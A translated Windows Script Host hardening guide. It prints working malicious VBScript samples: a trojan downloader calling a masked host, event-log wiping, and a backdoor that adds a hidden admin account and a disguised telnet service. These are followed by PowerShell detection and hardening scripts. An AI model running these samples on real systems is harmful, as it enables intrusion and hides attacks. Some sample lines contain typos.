Interlocking WSH security settings
WSH security
WSH -- "Windows Scripting Host".
A scripting-language runtime built into the Windows operating system.
Write a script file with a .vbs or .js extension and run it; at that point the system automatically invokes Windows Scripting Host, i.e. Wscript.exe (or Cscript.exe when run from the command line).
Attackers commonly use WSH to carry out malicious actions.
Several common WSH malicious programs
1. Download a trojan over HTTP and run it
Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.***/muma.exe",0
xPost.Send()
Set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "muma.exe",2
set ws=wscript.createobject("wscript.shell")
ws.run "muma.exe/start",0
2. Enumerate processes
@echo for each ps in getobject_>ps.vbs
@echo("winmgmts:\\.\root\cimv2:win32_process").instances_>>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next>>ps.vbs
Usage: cscript ps.vbs
3. Terminate a process
@echo for each ps in getobject_>pskill.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_>>pskill.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next>>pskill.vbs
Usage: cscript pskill.vbs pid
4. Use a script to clear the event logs
strComputer="."
Set objWMIService = GetObject("winmgmts:"_& "{impersonationLevel=impersonate,(Backup)}!\\"&_strComputer & "\root\cimv2")
dim mylogs(3)
mylogs(1)="application"
mylogs(2)="system"
mylogs(3)="security"
for Each logs in mylogs
set colLogFiles=objWMIService.Execdy_("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'")
For Each objLogfile in colLogFiles
objLogFile.ClearEventLog()
Next
Next
5. VBS backdoor
dim wsh
set wsh=Wscript.CreateObject("wscript.shell")
set wshshell=createobject("wscript.shell")
a=wshshell.run("netsh firewall set portopening TCP 23 ENABL",0) ' let the XP firewall allow port 23
b=wshshell.run("sc config tlntsvr start=auto",0) ' set telnet to manual
d=wshshell.run("net1 user a$ a /add",0)
e=wshshell.run("net1 localgroup administrators a$ /add",0)
f=wshshell.run("cmd /k copy ""%systemroot%\system32\tlntsvr.exe""""%systemroot%\java\rundll32.exe""",0) ' copy telnet into the java directory, renamed rundll32.exe
g=wshshell.run("sc create ccservice binpath=""%systemroot%\java\rundll32.exe""type=own",0) ' start it as a service with the sc command
h=wshshell.run("sc config ccservice DisplayName=Automatic Updates",0)
i=wshshell.run("sc description ccservice 通知所选用户和计算机有关系统管理级警报。",0)
j=wshshell.run("sc config ccservice start=auto",0)
k=wshshell.run("net1 start ccservice",0)
z=wshshell.run("ATTRIB +R +S +H ""%systemroot%\java\rundll32.exe""",0)
wsh.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\a$",0,"REG_DWORD"
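Every sample above shares one observable trait: a WSH host process (wscript.exe or cscript.exe) spawning an administrative tool such as netsh, sc, net1, cmd or attrib. The following PowerShell function, an added detection example that is not part of the original page, evaluates process-creation records in the shape of Sysmon Event ID 1 / Security 4688 fields (ParentImage, Image, CommandLine) and flags that parent/child pairing, attaching a reason when the command line matches one of the backdoor's specific actions. The events it runs over are constructed sample data, and the field names and regexes are this example's own assumptions.

```powershell
# Added example (not from the original page): flag process chains in which a
# WSH host (wscript.exe / cscript.exe) launches the admin tools driven by the
# backdoor above. Input records are constructed, Sysmon/4688-shaped hashtables.

$WshHosts = @('wscript.exe', 'cscript.exe')
$AdminTools = @('netsh.exe', 'sc.exe', 'net.exe', 'net1.exe', 'cmd.exe', 'attrib.exe')
# Command-line fragments matching the techniques shown above, each with a reason string.
$Patterns = @(
    @{ Regex = 'firewall\s+set\s+portopening';           Reason = 'firewall exception added' },
    @{ Regex = '\bsc(\.exe)?\s+(create|config)\s+';      Reason = 'service created/reconfigured' },
    @{ Regex = 'net1?\s+user\s+\S+\s+\S+\s+/add';        Reason = 'local account created' },
    @{ Regex = 'localgroup\s+administrators\s+.*\s/add'; Reason = 'account added to Administrators' },
    @{ Regex = 'tlntsvr\.exe';                           Reason = 'telnet service binary copied' }
)

function Test-WshSpawnedAdminTool {
    param([Parameter(Mandatory)] [hashtable] $Record)
    # Compare on bare image names so the path the host was run from does not matter.
    $parent = [System.IO.Path]::GetFileName($Record.ParentImage).ToLowerInvariant()
    $child  = [System.IO.Path]::GetFileName($Record.Image).ToLowerInvariant()
    if ($WshHosts -notcontains $parent)   { return $null }
    if ($AdminTools -notcontains $child)  { return $null }
    $reasons = foreach ($p in $Patterns) {
        if ($Record.CommandLine -imatch $p.Regex) { $p.Reason }
    }
    # The pairing alone is worth an alert even when no specific pattern matched.
    if (-not $reasons) { $reasons = @('WSH host launched an admin tool') }
    [pscustomobject]@{
        Time    = $Record.UtcTime
        Parent  = $parent
        Child   = $child
        Reasons = ($reasons -join '; ')
        Command = $Record.CommandLine
    }
}

# Constructed sample events: the first three mirror the backdoor's commands; the
# last two are benign (Explorer launching cmd, an admin running sc by hand) and
# must not be flagged.
$SampleEvents = @(
    @{ UtcTime = '2024-01-01 10:00:01'; ParentImage = 'C:\Windows\System32\wscript.exe'
       Image = 'C:\Windows\System32\netsh.exe'; CommandLine = 'netsh firewall set portopening TCP 23 ENABLE' },
    @{ UtcTime = '2024-01-01 10:00:02'; ParentImage = 'C:\Windows\System32\wscript.exe'
       Image = 'C:\Windows\System32\net1.exe'; CommandLine = 'net1 user a$ a /add' },
    @{ UtcTime = '2024-01-01 10:00:03'; ParentImage = 'C:\Windows\System32\cscript.exe'
       Image = 'C:\Windows\System32\sc.exe'; CommandLine = 'sc create ccservice binpath="C:\Windows\java\rundll32.exe" type=own' },
    @{ UtcTime = '2024-01-01 10:05:00'; ParentImage = 'C:\Windows\explorer.exe'
       Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe' },
    @{ UtcTime = '2024-01-01 10:06:00'; ParentImage = 'C:\Windows\System32\cmd.exe'
       Image = 'C:\Windows\System32\sc.exe'; CommandLine = 'sc query wuauserv' }
)

$SampleEvents | ForEach-Object { Test-WshSpawnedAdminTool $_ } | Where-Object { $_ } | Format-Table -AutoSize
```

Run as a script, it prints the three flagged chains and nothing for the two benign records. To use it on live data, map the fields of your Sysmon or 4688 events onto the same three keys; the reason list is where site-specific patterns (the page's log-clearing call shows up instead as Security event 1102, which is a separate signal) would be added.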
WSH security settings
1. Unregister the relevant OCX file and set its permissions
a) Unregister the WSH component file: regsvr32 /u C:\WINDOWS\system32\wshom.ocx
b) Deny the Guest account the use of shell32.dll so it cannot invoke this component: cacls C:\WINDOWS\system32\wshom.ocx /e /d guests
2. Disable cscript.exe
a) Rename it
b) Deny it with NTFS permissions
3. Disable the relevant registry entries
a) Rename HKEY_CLASSES_ROOT\WScript.Shell\ and HKEY_CLASSES_ROOT\WScript.Shell.1\ to some other name,
b) and change the CLSID value as well
The values of the CLSID entries under HKEY_CLASSES_ROOT\WScript.Shell\ and HKEY_CLASSES_ROOT\WScript.Shell.1\ can also be deleted.
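The three steps above are meant to back each other up: unregistering wshom.ocx removes the WScript.Shell ProgIDs, the file ACL stops a re-registration from helping a low-privileged user, and the host-executable and registry changes catch whatever the first two miss. The PowerShell script below, an added example that is not from the original page, audits all three as one procedure and, with -Apply, carries them out. It assumes an elevated PowerShell session; uses icacls where the page uses cacls; derives the System32 path from $env:SystemRoot rather than the page's literal C:\WINDOWS; and the "_disabled" suffix for the renamed ProgID keys and the choice of denying the Users group on the host executables are this example's own.

```powershell
# Added example (not from the original page): audit the page's three WSH
# hardening steps and optionally apply them. Run elevated. icacls replaces the
# page's cacls; the "_disabled" suffix and the Users deny are assumptions here.

[CmdletBinding()]
param([switch] $Apply)

$Sys32    = Join-Path $env:SystemRoot 'System32'
$Wshom    = Join-Path $Sys32 'wshom.ocx'
$Hosts    = @('cscript.exe', 'wscript.exe') | ForEach-Object { Join-Path $Sys32 $_ }
$ProgIds  = @('WScript.Shell', 'WScript.Shell.1')
$Findings = New-Object System.Collections.Generic.List[string]

# Step 1a: WScript.Shell still registered? (regsvr32 /u wshom.ocx removes the ProgIDs)
$registered = $ProgIds | Where-Object { Test-Path "Registry::HKEY_CLASSES_ROOT\$_" }
if ($registered) {
    $Findings.Add("ProgIDs still registered: $($registered -join ', ')")
    if ($Apply) { & regsvr32.exe /s /u $Wshom }
}

# Step 1b: the Guests group needs an explicit Deny ACE on wshom.ocx
if (Test-Path $Wshom) {
    $deny = (Get-Acl -Path $Wshom).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and $_.IdentityReference.Value -like '*\Guests'
    }
    if (-not $deny) {
        $Findings.Add("no Deny ACE for Guests on $Wshom")
        if ($Apply) { & icacls.exe $Wshom /deny 'Guests:(RX)' | Out-Null }
    }
}

# Step 2: cscript.exe / wscript.exe present and runnable (page: rename, or deny via NTFS)
foreach ($h in $Hosts) {
    if (-not (Test-Path $h)) { continue }   # already renamed or removed
    $deny = (Get-Acl -Path $h).Access | Where-Object {
        $_.AccessControlType -eq 'Deny' -and $_.IdentityReference.Value -like '*\Users'
    }
    if (-not $deny) {
        $Findings.Add("$h is present with no NTFS Deny ACE for Users")
        if ($Apply) { & icacls.exe $h /deny 'Users:(RX)' | Out-Null }
    }
}

# Step 3: rename the ProgID keys and drop their CLSID subkeys
foreach ($p in $ProgIds) {
    $key = "Registry::HKEY_CLASSES_ROOT\$p"
    if (-not (Test-Path $key)) { continue }
    if (Test-Path "$key\CLSID") { $Findings.Add("$p\CLSID still present") }
    if ($Apply) {
        Remove-Item -Path "$key\CLSID" -Recurse -ErrorAction SilentlyContinue
        Rename-Item -Path $key -NewName "${p}_disabled"
    }
}

if ($Findings.Count -eq 0) { 'WSH hardening: all checks pass' } else { $Findings }
```

Run without -Apply first; each finding names the step that is still open. Two consequences to weigh before applying: a Deny ACE for Users on cscript.exe and wscript.exe also blocks administrators (Deny wins over Allow, and administrators are members of Users), so legitimate logon scripts and management tooling that depend on WSH will break; and step 3 only has work to do when step 1a was skipped, because unregistering wshom.ocx already removes the WScript.Shell keys.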